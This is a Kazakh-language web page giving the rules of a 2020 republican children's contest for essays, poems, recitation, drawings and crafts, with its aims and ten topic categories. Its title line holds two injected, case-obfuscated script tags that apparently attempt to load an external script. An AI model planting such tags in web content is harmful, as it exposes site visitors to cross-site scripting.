Республикалық білім беру орталығы «GLOBUS» I Республикалық эссе, шығарма, өлең, мәнерлеп оқу, суреттер, фото суреттер және қолөнерлер байқауының ережесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
09.09.2020
Жалпы ереже
БАЙҚАУДЫҢ МАҚСАТТАРЫ МЕН МІНДЕТТЕРІ
- Дарынды балаларды анықтау және оларды қолдау
- Баланың әлемді эмоционалдық тұрғыдан танудағы эстетикалық сезімі, оның жеке шығармашылық дамуы
- Отанға деген махаббат пен өнегелік - патриоттық сезімді тәрбиелеу;
- Мектепке дейінгі жастағы балаларды жалпы адами құндылықтар мен мәдениетке баулу;
- Балалардың елестету, қиялдау қабілеттерінің және көркем шығармашылығының дамуын ынталандыру;
Байқау тақырыптары:
- «Денсаулық-зор байлық» - жұмыстар эссе, шығарма, сурет түрінде қабылданады
- «Мен және менің ұстазым» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Ата заң-алтын арқауым» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Өлең-өмір» - еркін тақырыпта кез келген ақынның өлеңін мәнерлеп оқу
- «Қылқалам шебері» - еркін тақырыпта сурет салу
- «Туған өлкем, неткен көркем» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Жас ақындар мүшәйрасы» - қатысушы өзі шығарған өлеңін жолдайды
- «Көркем жазу» - Кез келген ақынның өлеңін көшіріп жазу
- «Алтын күз» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Қолөнер- мол өнер » - қатысушы өзі дайындаған аппликация, гербарий т.б қолөнер жұмыстарын жіберу.
Сыздыкова А
Просмотров: 1028